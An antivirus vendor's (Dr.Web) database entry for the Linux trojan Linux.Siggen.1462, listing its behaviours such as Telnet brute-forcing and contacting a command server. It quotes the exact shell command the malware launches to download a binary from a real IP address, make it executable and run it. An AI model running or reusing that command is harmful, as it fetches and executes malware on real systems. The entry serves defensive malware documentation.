Meine Bibliothek
Meine Bibliothek

+ Zur Bibliothek hinzufügen

Support

Ihre Anfragen

Rufen Sie uns an

+7 (495) 789-45-86

Profil

Linux.Siggen.1462

Added to the Dr.Web virus database: 2019-02-27

Virus description added:

Technical Information

Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
  • up76vkvis72o
Launches processes:
  • /bin/sh -c wget http://178.62.227.13/wrgjwrgjwrg246356356356/n7; chmod 777 *; ./n7 wget.echo.telnet.arm7
  • wget http://178.62.227.13/wrgjwrgjwrg246356356356/n7
  • chmod 777 n7 run.sh stdout.log
  • ./n7 wget.echo.telnet.arm7
Performs operations with the file system:
Modifies file access rights:
  • /root/n7
  • /root/run.sh
Creates or modifies files:
  • /root/n7
Deletes files:
  • /root/n7
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:13562
Establishes connection:
  • 8.#.8.8:53
  • 17#.##.227.13:3456
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
  • 17#.##.###.#3/wrgjwrgjwrg246356356356/n7
Sends data to the following servers:
  • 17#.##.227.13:3456
Receives data from the following servers:
  • 17#.##.227.13:3456

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number